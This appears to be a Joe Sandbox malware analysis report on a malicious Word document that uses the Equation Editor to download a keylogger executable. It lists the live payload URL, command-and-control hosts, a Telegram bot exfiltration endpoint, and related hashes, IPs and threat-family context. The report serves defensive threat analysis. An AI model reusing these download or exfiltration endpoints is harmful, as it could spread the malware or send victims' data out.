http://87.120.84.38/txt/pKL9HXcZosWfPt1.exettC:	EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://varders.kozow.com:8081	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/favicon.ico	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://aborters.duckdns.org:8081	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ac.ecosia.org/autocomplete?q=	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/sorry/index	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003811000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/search?q=wmf	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://anotherarmy.dns.army:8081	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://87.120.84.38/txt/pKL9HXcZosWfPt1.exe7j	EQNEDT32.EXE, 00000002.00000002.392731414.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.org/q	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://reallyfreegeoip.org	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://87.120.84.38/txt/pKL9HXcZosWfPt1.exeC:	EQNEDT32.EXE, 00000002.00000003.392546083.0000000000630000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.392731414.0000000000630000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/search?q=net	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com/sorry/indextest	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003748000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000381E000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000376A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://checkip.dyndns.com	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.entrust.net0D	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	cmnjgwhesilo61000.exe, 00000005.00000002.408443204.0000000002674000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org/xml/	cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	unknown	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.97.3	unknown	European Union	13335	CLOUDFLARENETUS	false
87.120.84.38	unknown	Bulgaria	51189	SHARCOM-ASBG	true
193.122.6.168	checkip.dyndns.com	United States	31898	ORACLE-BMC-31898US	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
193.122.130.0	unknown	United States	31898	ORACLE-BMC-31898US	false
158.101.44.242	unknown	United States	31898	ORACLE-BMC-31898US	false
132.226.247.73	unknown	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545181
Start date and time:	2024-10-30 08:23:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	na.doc
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winDOC@9/14@26/9
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 99% Number of executed functions: 94 Number of non-executed functions: 131
Cookbook Comments:	Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
Execution Graph export aborted for target EQNEDT32.EXE, PID 3304 because there are no executed function
Execution Graph export aborted for target cmnjgwhesilo61000.exe, PID 3572 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: na.doc

Simulations

Behavior and APIs

Time	Type	Description
03:24:59	API Interceptor	271x Sleep call for process: EQNEDT32.EXE modified
03:25:03	API Interceptor	770566x Sleep call for process: cmnjgwhesilo61000.exe modified
03:25:10	API Interceptor	22x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Quality stuff.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	z59IKE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	come.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	INVOICE.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	AWB#21138700102.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
149.154.167.220	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	WhiteSnake Stealer	Browse
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
checkip.dyndns.com	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	Quality stuff.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	158.101.44.242
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.6.168
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
api.telegram.org	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	WhiteSnake Stealer	Browse	149.154.167.220
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	WhiteSnake Stealer	Browse	149.154.167.220
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Payment&WarantyBonds.exe	Get hash	malicious	FormBook	Browse	172.67.154.67
	PO.2407010.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	104.21.74.191
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	File07098.PDF.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	lf1SPbZI3V.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3
	PO-004976.xls	Get hash	malicious	Unknown	Browse	188.114.96.3
UTMEMUS	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	ADJUNTA.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Quality stuff.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Request For Quotation-RFQ097524.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbs	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	z59IKE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe	Get hash	malicious	CryptOne, Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	rShippingDocuments240384.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
SHARCOM-ASBG	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.120.84.38
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.120.84.38
	zxalphamn.doc	Get hash	malicious	Lokibot	Browse	87.120.84.39
	Proforma Invoice347.doc	Get hash	malicious	Nanocore	Browse	87.120.84.38
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.120.84.38
	na.doc	Get hash	malicious	MassLogger RAT	Browse	87.120.84.38
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	87.120.84.38
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.120.84.38
	na.doc	Get hash	malicious	VIP Keylogger	Browse	87.120.84.38
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	87.120.84.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO.2407010.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	188.114.96.3
	Po docs.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	188.114.96.3
	Comprobante de pago.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	188.114.96.3
	AWB-M09CT560.docx.doc	Get hash	malicious	Unknown	Browse	188.114.96.3
	0001.xls	Get hash	malicious	Remcos	Browse	188.114.96.3
	1.rtf	Get hash	malicious	Remcos	Browse	188.114.96.3
	ingswhic.doc	Get hash	malicious	Remcos	Browse	188.114.96.3
	swithnew.doc	Get hash	malicious	Remcos	Browse	188.114.96.3
36f7277af969a6947a61ae0b815907a1	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Proforma-Invoice#018879TT0100..doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	na.doc	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	na.doc	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	na.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mnobizxv.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REVISED INVOICE.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	755712
Entropy (8bit):	7.949773362732047
Encrypted:	false
SSDEEP:	12288:MlaDPw1Qk89Tmy18IAAM4d8bKDIy/8GelBse0cf9c8HuFSP6px4pBCBOVsppbQ8c:MsLw9gTFSN4SbsI8KBocmQPkxY8OVs78
MD5:	06A6B60A72D4C7A394B8345EE8047851
SHA1:	3954D8D9B1FBC4B45C6B94C3B7D6901AEE7E350A
SHA-256:	518B7B68A0D659F27A704C2976F7027987DBA584696F96B89653786C504B8D70
SHA-512:	D667BA592819119C4BFC0CFE93ABEE5D410714859F479EE30B911CB130839F30AF2071A2EAC84F9E630433F80D243D47841D9F47D034CAFC8BD33CE2127DE05E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....!g..............0..l............... ........@.. ....................................@.................................P...O....... ............................................................................ ............... ..H............text....j... ...l.................. ..`.rsrc... ............n..............@..@.reloc..............................@..B........................H........q...g...........................................................0...........(......(.....+.....0...........(.......(.....+....0...........(........(.....+...0...........(.........(.....+......0...........(...........(.....+....0...........(.............(.....+......0.................(.......(.....+......0.................(........(.....+.....0.................(.........(.....+....0.................(...........( ....+......0.................(.............(!.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{1108CD75-6DAB-436C-B469-6FC2E69FADEC}.tmp

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	CE338FE6899778AACFC28414F2D9498B
SHA1:	897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
SHA-256:	4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
SHA-512:	6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B82D526-DA5E-48B6-9927-FFCE89E887B8}.tmp

Download File

